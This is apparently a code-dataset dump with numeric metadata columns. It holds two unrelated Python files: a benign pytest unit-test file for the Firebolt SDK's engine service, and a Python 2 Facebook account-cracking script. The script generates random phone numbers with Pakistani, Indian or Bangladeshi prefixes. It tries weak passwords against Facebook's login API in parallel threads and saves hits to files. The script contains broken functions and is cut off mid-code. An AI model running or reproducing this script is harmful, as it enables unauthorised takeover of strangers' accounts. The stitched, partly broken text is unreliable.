| 0.745196
| 0.686717
| 0
| 0.005128
| 0.1494
| 1,834
| 47
| 94
| 39.021277
| 0.762179
| 0.056707
| 0
| 0.548387
| 0
| 0
| 0.337587
| 0.013921
| 0
| 0
| 0
| 0
| 0.225806
| 1
| 0.064516
| false
| 0
| 0.064516
| 0
| 0.129032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50bea0cb3bd11757b1e0a45ac25695fe12634209
| 14,799
|
py
|
Python
|
tests/unit/service/test_engine.py
|
firebolt-db/firebolt-python-sdk
|
35154a5ce070e71138d8573ce4c97891e212a939
|
[
"Apache-2.0"
] | 4
|
2022-01-29T19:21:52.000Z
|
2022-03-25T20:48:14.000Z
|
tests/unit/service/test_engine.py
|
firebolt-db/firebolt-python-sdk
|
35154a5ce070e71138d8573ce4c97891e212a939
|
[
"Apache-2.0"
] | 92
|
2021-11-19T18:15:15.000Z
|
2022-03-30T11:52:06.000Z
|
tests/unit/service/test_engine.py
|
firebolt-db/firebolt-python-sdk
|
35154a5ce070e71138d8573ce4c97891e212a939
|
[
"Apache-2.0"
] | 6
|
2021-11-22T22:04:20.000Z
|
2022-02-18T15:30:23.000Z
|
from typing import Callable, List
from pydantic import ValidationError
from pytest import raises
from pytest_httpx import HTTPXMock
from firebolt.common import Settings
from firebolt.model.engine import Engine, _EngineCreateRequest
from firebolt.model.engine_revision import EngineRevision
from firebolt.model.instance_type import InstanceType
from firebolt.model.region import Region
from firebolt.service.manager import ResourceManager
from firebolt.utils.exception import FireboltError, NoAttachedDatabaseError
def test_engine_create(
    httpx_mock: HTTPXMock,
    auth_callback: Callable,
    auth_url: str,
    provider_callback: Callable,
    provider_url: str,
    instance_type_region_1_callback: Callable,
    instance_type_region_1_url: str,
    region_callback: Callable,
    region_url: str,
    settings: Settings,
    mock_instance_types: List[InstanceType],
    mock_regions,
    mock_engine: Engine,
    engine_name: str,
    account_id_callback: Callable,
    account_id_url: str,
    engine_callback: Callable,
    engine_url: str,
):
    """Creating an engine via ResourceManager POSTs to the engine endpoint
    and the returned engine carries the requested name.

    All HTTP traffic is intercepted by httpx_mock; the *_callback/*_url pairs
    come from fixtures. NOTE(review): keep the add_callback registrations in
    this order — mock matching may depend on registration order.
    """
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(provider_callback, url=provider_url)
    httpx_mock.add_callback(
        instance_type_region_1_callback, url=instance_type_region_1_url
    )
    httpx_mock.add_callback(account_id_callback, url=account_id_url)
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(region_callback, url=region_url)
    httpx_mock.add_callback(engine_callback, url=engine_url, method="POST")
    manager = ResourceManager(settings=settings)
    engine = manager.engines.create(name=engine_name)
    assert engine.name == engine_name
def test_engine_create_with_kwargs(
    httpx_mock: HTTPXMock,
    auth_callback: Callable,
    auth_url: str,
    provider_callback: Callable,
    provider_url: str,
    instance_type_region_1_callback: Callable,
    instance_type_region_1_url: str,
    region_callback: Callable,
    region_url: str,
    settings: Settings,
    mock_engine: Engine,
    engine_name: str,
    account_id_callback: Callable,
    account_id_url: str,
    engine_callback: Callable,
    engine_url: str,
    account_id: str,
    mock_engine_revision: EngineRevision,
):
    """engine_settings_kwargs / revision_spec_kwargs passed to engines.create
    must end up in the serialized _EngineCreateRequest body: the mocked POST
    matches on the exact JSON payload (match_content), so the test fails if
    the kwargs are dropped or serialized differently.
    """
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(provider_callback, url=provider_url)
    httpx_mock.add_callback(
        instance_type_region_1_callback, url=instance_type_region_1_url
    )
    httpx_mock.add_callback(account_id_callback, url=account_id_url)
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(region_callback, url=region_url)
    # Setting to manager.engines.create defaults
    mock_engine.key = None
    mock_engine.description = ""
    mock_engine.endpoint = None
    # Testing kwargs
    mock_engine.settings.minimum_logging_level = "ENGINE_SETTINGS_LOGGING_LEVEL_DEBUG"
    mock_engine_revision.specification.proxy_version = "0.2.3"
    engine_content = _EngineCreateRequest(
        account_id=account_id, engine=mock_engine, engine_revision=mock_engine_revision
    )
    httpx_mock.add_callback(
        engine_callback,
        url=engine_url,
        method="POST",
        match_content=engine_content.json(by_alias=True).encode("ascii"),
    )
    manager = ResourceManager(settings=settings)
    engine_settings_kwargs = {
        "minimum_logging_level": "ENGINE_SETTINGS_LOGGING_LEVEL_DEBUG"
    }
    revision_spec_kwargs = {"proxy_version": "0.2.3"}
    engine = manager.engines.create(
        name=engine_name,
        engine_settings_kwargs=engine_settings_kwargs,
        revision_spec_kwargs=revision_spec_kwargs,
    )
    assert engine.name == engine_name
def test_engine_create_with_kwargs_fail(
    httpx_mock: HTTPXMock,
    auth_callback: Callable,
    auth_url: str,
    provider_callback: Callable,
    provider_url: str,
    instance_type_region_1_callback: Callable,
    instance_type_region_1_url: str,
    region_callback: Callable,
    region_url: str,
    settings: Settings,
    engine_name: str,
    account_id_callback: Callable,
    account_id_url: str,
):
    """Unknown kwargs are rejected before any engine is created:
    revision_spec_kwargs -> pydantic ValidationError,
    engine_settings_kwargs -> TypeError.
    """
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(provider_callback, url=provider_url)
    httpx_mock.add_callback(
        instance_type_region_1_callback, url=instance_type_region_1_url
    )
    httpx_mock.add_callback(account_id_callback, url=account_id_url)
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(region_callback, url=region_url)
    manager = ResourceManager(settings=settings)
    revision_spec_kwargs = {"incorrect_kwarg": "val"}
    with raises(ValidationError):
        manager.engines.create(
            name=engine_name, revision_spec_kwargs=revision_spec_kwargs
        )
    engine_settings_kwargs = {"incorrect_kwarg": "val"}
    with raises(TypeError):
        manager.engines.create(
            name=engine_name, engine_settings_kwargs=engine_settings_kwargs
        )
def test_engine_create_no_available_types(
    httpx_mock: HTTPXMock,
    auth_callback: Callable,
    auth_url: str,
    provider_callback: Callable,
    provider_url: str,
    instance_type_empty_callback: Callable,
    instance_type_region_2_url: str,
    settings: Settings,
    mock_instance_types: List[InstanceType],
    engine_name: str,
    account_id_callback: Callable,
    account_id_url: str,
    engine_url: str,
    region_2: Region,
):
    """Creating an engine in a region whose instance-type listing is empty
    (instance_type_empty_callback) raises FireboltError."""
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(provider_callback, url=provider_url)
    httpx_mock.add_callback(
        instance_type_empty_callback, url=instance_type_region_2_url
    )
    httpx_mock.add_callback(account_id_callback, url=account_id_url)
    httpx_mock.add_callback(auth_callback, url=auth_url)
    manager = ResourceManager(settings=settings)
    with raises(FireboltError):
        manager.engines.create(name=engine_name, region=region_2)
def test_engine_no_attached_database(
    httpx_mock: HTTPXMock,
    auth_callback: Callable,
    auth_url: str,
    provider_callback: Callable,
    provider_url: str,
    instance_type_region_1_callback: Callable,
    instance_type_region_1_url: str,
    region_callback: Callable,
    region_url: str,
    settings: Settings,
    mock_instance_types: List[InstanceType],
    mock_regions,
    mock_engine: Engine,
    engine_name: str,
    account_id_callback: Callable,
    account_id_url: str,
    engine_callback: Callable,
    engine_url: str,
    account_engine_callback: Callable,
    account_engine_url: str,
    database_callback: Callable,
    database_url: str,
    no_bindings_callback: Callable,
    bindings_url: str,
):
    """Starting an engine whose bindings listing is empty
    (no_bindings_callback) raises NoAttachedDatabaseError."""
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(provider_callback, url=provider_url)
    httpx_mock.add_callback(
        instance_type_region_1_callback, url=instance_type_region_1_url
    )
    httpx_mock.add_callback(account_id_callback, url=account_id_url)
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(region_callback, url=region_url)
    httpx_mock.add_callback(engine_callback, url=engine_url, method="POST")
    httpx_mock.add_callback(no_bindings_callback, url=bindings_url)
    manager = ResourceManager(settings=settings)
    engine = manager.engines.create(name=engine_name)
    with raises(NoAttachedDatabaseError):
        engine.start()
def test_engine_start_binding_to_missing_database(
    httpx_mock: HTTPXMock,
    auth_callback: Callable,
    auth_url: str,
    provider_callback: Callable,
    provider_url: str,
    instance_type_region_1_callback: Callable,
    instance_type_region_1_url: str,
    region_callback: Callable,
    region_url: str,
    settings: Settings,
    mock_instance_types: List[InstanceType],
    mock_regions,
    mock_engine: Engine,
    engine_name: str,
    account_id_callback: Callable,
    account_id_url: str,
    engine_callback: Callable,
    engine_url: str,
    database_not_found_callback: Callable,
    database_url: str,
    bindings_callback: Callable,
    bindings_url: str,
):
    """Starting an engine whose binding points at a database the API reports
    as missing (database_not_found_callback) also raises
    NoAttachedDatabaseError."""
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(provider_callback, url=provider_url)
    httpx_mock.add_callback(
        instance_type_region_1_callback, url=instance_type_region_1_url
    )
    httpx_mock.add_callback(account_id_callback, url=account_id_url)
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(region_callback, url=region_url)
    httpx_mock.add_callback(engine_callback, url=engine_url, method="POST")
    httpx_mock.add_callback(bindings_callback, url=bindings_url)
    httpx_mock.add_callback(database_not_found_callback, url=database_url)
    manager = ResourceManager(settings=settings)
    engine = manager.engines.create(name=engine_name)
    with raises(NoAttachedDatabaseError):
        engine.start()
def test_get_connection(
    httpx_mock: HTTPXMock,
    auth_callback: Callable,
    auth_url: str,
    provider_callback: Callable,
    provider_url: str,
    instance_type_region_1_callback: Callable,
    instance_type_region_1_url: str,
    region_callback: Callable,
    region_url: str,
    settings: Settings,
    mock_instance_types: List[InstanceType],
    mock_regions,
    mock_engine: Engine,
    engine_name: str,
    account_id_callback: Callable,
    account_id_url: str,
    engine_callback: Callable,
    engine_url: str,
    db_name: str,
    database_callback: Callable,
    database_url: str,
    bindings_callback: Callable,
    bindings_url: str,
):
    """engine.get_connection() yields a usable (truthy) connection when the
    engine has a resolvable bound database."""
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(provider_callback, url=provider_url)
    httpx_mock.add_callback(
        instance_type_region_1_callback, url=instance_type_region_1_url
    )
    httpx_mock.add_callback(account_id_callback, url=account_id_url)
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(region_callback, url=region_url)
    httpx_mock.add_callback(engine_callback, url=engine_url, method="POST")
    httpx_mock.add_callback(bindings_callback, url=bindings_url)
    httpx_mock.add_callback(database_callback, url=database_url)
    manager = ResourceManager(settings=settings)
    engine = manager.engines.create(name=engine_name)
    with engine.get_connection() as connection:
        assert connection
def test_attach_to_database(
    httpx_mock: HTTPXMock,
    auth_callback: Callable,
    auth_url: str,
    provider_callback: Callable,
    provider_url: str,
    region_callback: Callable,
    region_url: str,
    instance_type_region_1_callback: Callable,
    instance_type_region_1_url: str,
    settings: Settings,
    account_id_callback: Callable,
    account_id_url: str,
    create_databases_callback: Callable,
    databases_url: str,
    database_get_callback: Callable,
    database_get_url: str,
    database_not_found_callback: Callable,
    database_url: str,
    db_name: str,
    engine_name: str,
    engine_callback: Callable,
    engine_url: str,
    create_binding_callback: Callable,
    create_binding_url: str,
    bindings_callback: Callable,
    bindings_url: str,
):
    """attach_to_database creates a binding (POST to create_binding_url) and
    afterwards engine.database resolves to the attached database."""
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(provider_callback, url=provider_url)
    httpx_mock.add_callback(
        instance_type_region_1_callback, url=instance_type_region_1_url
    )
    httpx_mock.add_callback(account_id_callback, url=account_id_url)
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(bindings_callback, url=bindings_url)
    httpx_mock.add_callback(create_databases_callback, url=databases_url, method="POST")
    httpx_mock.add_callback(database_not_found_callback, url=database_url, method="GET")
    # create engine
    httpx_mock.add_callback(region_callback, url=region_url)
    httpx_mock.add_callback(engine_callback, url=engine_url, method="POST")
    # attach
    httpx_mock.add_callback(database_get_callback, url=database_get_url)
    httpx_mock.add_callback(
        create_binding_callback, url=create_binding_url, method="POST"
    )
    manager = ResourceManager(settings=settings)
    database = manager.databases.create(name=db_name)
    engine = manager.engines.create(name=engine_name)
    engine.attach_to_database(database=database)
    assert engine.database == database
def test_engine_update(
    httpx_mock: HTTPXMock,
    auth_callback: Callable,
    auth_url: str,
    provider_callback: Callable,
    provider_url: str,
    instance_type_region_1_callback: Callable,
    instance_type_region_1_url: str,
    region_callback: Callable,
    region_url: str,
    settings: Settings,
    mock_instance_types: List[InstanceType],
    mock_regions,
    mock_engine: Engine,
    engine_name: str,
    account_id_callback: Callable,
    account_id_url: str,
    engine_callback: Callable,
    engine_url: str,
    account_engine_url: str,
    account_engine_callback: Callable,
):
    """Engine.update issues a PATCH to the account engine URL and the returned
    engine reflects the new name and description."""
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(provider_callback, url=provider_url)
    httpx_mock.add_callback(account_id_callback, url=account_id_url)
    httpx_mock.add_callback(auth_callback, url=auth_url)
    # PATCH handler for the update call itself
    httpx_mock.add_callback(
        account_engine_callback, url=account_engine_url, method="PATCH"
    )
    manager = ResourceManager(settings=settings)
    mock_engine._service = manager.engines
    engine = mock_engine.update(
        name="new_engine_name", description="new engine description"
    )
    assert engine.name == "new_engine_name"
    assert engine.description == "new engine description"
def test_engine_restart(
    httpx_mock: HTTPXMock,
    auth_callback: Callable,
    auth_url: str,
    provider_callback: Callable,
    provider_url: str,
    settings: Settings,
    mock_engine: Engine,
    account_id_callback: Callable,
    account_id_url: str,
    engine_callback: Callable,
    account_engine_url: str,
    bindings_callback: Callable,
    bindings_url: str,
    database_callback: Callable,
    database_url: str,
):
    """Engine.restart(wait_for_startup=False) POSTs to the ':restart' action
    URL and returns an engine with the same name."""
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(provider_callback, url=provider_url)
    httpx_mock.add_callback(account_id_callback, url=account_id_url)
    httpx_mock.add_callback(auth_callback, url=auth_url)
    httpx_mock.add_callback(
        engine_callback, url=f"{account_engine_url}:restart", method="POST"
    )
    httpx_mock.add_callback(bindings_callback, url=bindings_url)
    httpx_mock.add_callback(database_callback, url=database_url)
    manager = ResourceManager(settings=settings)
    mock_engine._service = manager.engines
    engine = mock_engine.restart(wait_for_startup=False)
    assert engine.name == mock_engine.name
| 33.107383
| 88
| 0.757416
| 1,889
| 14,799
| 5.519322
| 0.058232
| 0.073374
| 0.086323
| 0.143871
| 0.829944
| 0.805486
| 0.778247
| 0.75705
| 0.722808
| 0.717533
| 0
| 0.003243
| 0.166498
| 14,799
| 446
| 89
| 33.181614
| 0.841994
| 0.005271
| 0
| 0.751282
| 0
| 0
| 0.020455
| 0.008087
| 0
| 0
| 0
| 0
| 0.017949
| 1
| 0.025641
| false
| 0
| 0.028205
| 0
| 0.053846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50f90069509f783e543ca35adc39f8104e465db7
| 22,700
|
py
|
Python
|
hcrack/.no_dec.py
|
shyamjangid07/Reverse-Engineering
|
469efabcd6057f7895d8d891f1fabdf2ffe730b0
|
[
"Apache-2.0"
] | 337
|
2020-08-15T12:22:14.000Z
|
2022-03-29T06:05:15.000Z
|
hcrack/.no_dec.py
|
ajairakaam/Reverse-Engineering
|
49d00bafd0622ffb79e081946a19c5fd3a42628f
|
[
"Apache-2.0"
] | 3
|
2020-11-12T14:30:48.000Z
|
2021-05-18T16:56:22.000Z
|
hcrack/.no_dec.py
|
ajairakaam/Reverse-Engineering
|
49d00bafd0622ffb79e081946a19c5fd3a42628f
|
[
"Apache-2.0"
] | 83
|
2020-08-15T00:22:58.000Z
|
2022-03-31T08:40:23.000Z
|
#!/usr/bin/python
# coding=utf-8
# Originally Written By:Muhammad Hamza
# Source : Python2"
# Donot Recode It.
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(2000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system("pip2 install tqdm")
try:
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass,mechanize,requests
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
except ImportError:
os.system('pip2 install requests')
os.system('pip2 install mechanize')
os.system('pip2 install tqdm')
#Browser Setting
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exit():
print "[!] Exit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def hamza(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
from tqdm import tqdm
def load():
with tqdm(total=100, desc="Loading ",bar_format="{l_bar}{bar}") as pbar:
for i in range(100):
time.sleep(0.030)
pbar.update(1)
##### LOGO #####
banner = """
╔╗─╔╗╔═══╗╔═╗╔═╗╔════╗╔═══╗
║║─║║║╔═╗║║║╚╝║║╚══╗═║║╔═╗║
║╚═╝║║║─║║║╔╗╔╗║──╔╝╔╝║║─║║
║╔═╗║║╚═╝║║║║║║║─╔╝╔╝─║╚═╝║
║║─║║║╔═╗║║║║║║║╔╝═╚═╗║╔═╗║
╚╝─╚╝╚╝─╚╝╚╝╚╝╚╝╚════╝╚╝─╚╝
-----------------------------------------------
➣ Coder : Muhammad Hamza
➣ Github : https://github.com/Hamzahash
➣ Facebook: Muhammad Hamza
➣ Youtube : HOP Anonymous
-----------------------------------------------"""
back = 0
threads = []
successful = []
checkpoint = []
oks = []
gagal = []
idh = []
id = []
def crack_no():
os.system('clear')
print banner
print
print "[1] Clone From Pakistan"
print "[2] Clone From India"
print "[3] Clone From Bangladesh"
print "[4] Clone From USA"
print "[0] Back To Main Menu"
print
crack_no_action()
def crack_no_action():
no = raw_input('Choose Country >>> ')
if no =="":
print "Wrong Input"
time.sleep(1)
crack_no_action()
elif no =="1":
pakistan()
elif no =="2":
india()
elif no =="3":
bangladesh()
elif no =="4":
usa()
elif no =="0":
os.system('python2 .hop2.py')
else:
print "Wrong Input"
time.sleep(1)
crack_no_action()
def pakistan():
os.system("clear")
print banner
print
try:
c = raw_input("[+] Enter 3 Digits Code : ")
exit('[!] Code Must Be 3 Digit ') if len(c) < 3 else ''
k="0"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[Press Enter To Back] ")
crack_no()
xxx = str(len(id))
hamza ('\033[1;97m[\033[1;97m✓\033[1;97m]\033[1;97m Total Number \033[1;97m:\033[1;97m '+xxx)
time.sleep(0.5)
hamza ('[✓] The Process Has Started')
time.sleep(0.5)
hamza ('\033[1;97m[\033[1;97m!\033[1;97m] \033[1;97mPress CTRL Z To Stop')
time.sleep(0.5)
print (47*"-")
#### MAIN PAKISTAN ####
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass1
oka = open('save/pakistan.txt', 'a')
oka.write("[Successful]" +k+c+user+" | "+pass1+"\n")
oka.close()
oks.append(user+pass1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass1
cps = open('save/pakistan.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass1+"\n")
cps.close()
checkpoint.append(user+pass1)
else:
pass2 = '786786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass2
oka = open('save/pakistan.txt', 'a')
oka.write("[Successful] " +k+c+user+" | "+pass2+"\n")
oka.close()
oks.append(user+pass2)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass2
cps = open('save/pakistan.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass2+"\n")
cps.close()
checkpoint.append(user+pass2)
else:
pass3 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass3
oka = open('save/pakistan.txt', 'a')
oka.write("[Checkpoint] " +k+c+user+" | "+pass3+"\n")
oka.close()
oks.append(user+pass3)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass3
cps = open('save/pakistan.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass3+"\n")
cps.close()
checkpoint.append(user+pass3)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m----------------------------------------------"
hamza('[✓] Process Has Been Completed.')
hamza('\033[1;97m[✓] Checkpoint IDS Has Been Saved.')
xx = str(len(oks))
xxx = str(len(checkpoint))
print ("[✓] Total \033[1;32mOK/\033[1;97mCP : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))
print (47*"-")
raw_input("\nPress Enter To Back ")
crack_no()
def india():
os.system("clear")
print banner
print
print("Useful Codes : 755 855 935 965 975 995")
print
try:
c = raw_input("[+] Enter 3 Digits Code : ")
exit('[!] Code Must Be 3 Digit ') if len(c) < 3 else ''
k="+91"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[Press Enter To Back] ")
crack_no()
xxx = str(len(id))
hamza ('\033[1;97m[\033[1;97m✓\033[1;97m]\033[1;97m Total Number \033[1;97m:\033[1;97m '+xxx)
time.sleep(0.5)
hamza ('[✓] The Process Has Started')
time.sleep(0.5)
hamza ('\033[1;97m[\033[1;97m!\033[1;97m] \033[1;97mPress CTRL Z To Stop')
time.sleep(0.5)
print (47*"-")
#### MAIN India ####
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass1
oka = open('save/india.txt', 'a')
oka.write("[Successful]" +k+c+user+" | "+pass1+"\n")
oka.close()
oks.append(user+pass1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass1
cps = open('save/india.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass1+"\n")
cps.close()
checkpoint.append(user+pass1)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m----------------------------------------------"
hamza('[✓] Process Has Been Completed.')
hamza('\033[1;97m[✓] Checkpoint IDS Has Been Saved.')
xx = str(len(oks))
xxx = str(len(checkpoint))
print ("[✓] Total \033[1;32mOK/\033[1;97mCP : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))
print (47*"-")
raw_input("\nPress Enter To Back ")
crack_no()
def bangladesh():
os.system("clear")
print banner
print
print "Useful Codes : 191 To 199"
try:
c = raw_input("[+] Enter 3 Digits Code : ")
exit('[!] Code Must Be 3 Digit ') if len(c) < 3 else ''
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[Press Enter To Back] ")
crack_no()
xxx = str(len(id))
hamza ('\033[1;97m[\033[1;97m✓\033[1;97m]\033[1;97m Total Number \033[1;97m:\033[1;97m '+xxx)
time.sleep(0.5)
hamza ('[✓] The Process Has Started')
time.sleep(0.5)
hamza ('\033[1;97m[\033[1;97m!\033[1;97m] \033[1;97mPress CTRL Z To Stop')
time.sleep(0.5)
print (47*"-")
#### MAIN Bangladesh ####
def main(arg):
global checkpoint,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass1
oka = open('save/bang.txt', 'a')
oka.write("[Successful]" +k+c+user+" | "+pass1+"\n")
oka.close()
oks.append(user+pass1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass1
cps = open('save/bangla.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass1+"\n")
cps.close()
checkpoint.append(user+pass1)
else:
pass2 = 'allah786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass2
oka = open('save/bang.txt', 'a')
oka.write("[Successful] " +k+c+user+" | "+pass2+"\n")
oka.close()
oks.append(user+pass2)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass2
cps = open('save/bang.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass2+"\n")
cps.close()
checkpoint.append(user+pass2)
else:
pass3 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass2
oka = open('save/bang.txt', 'a')
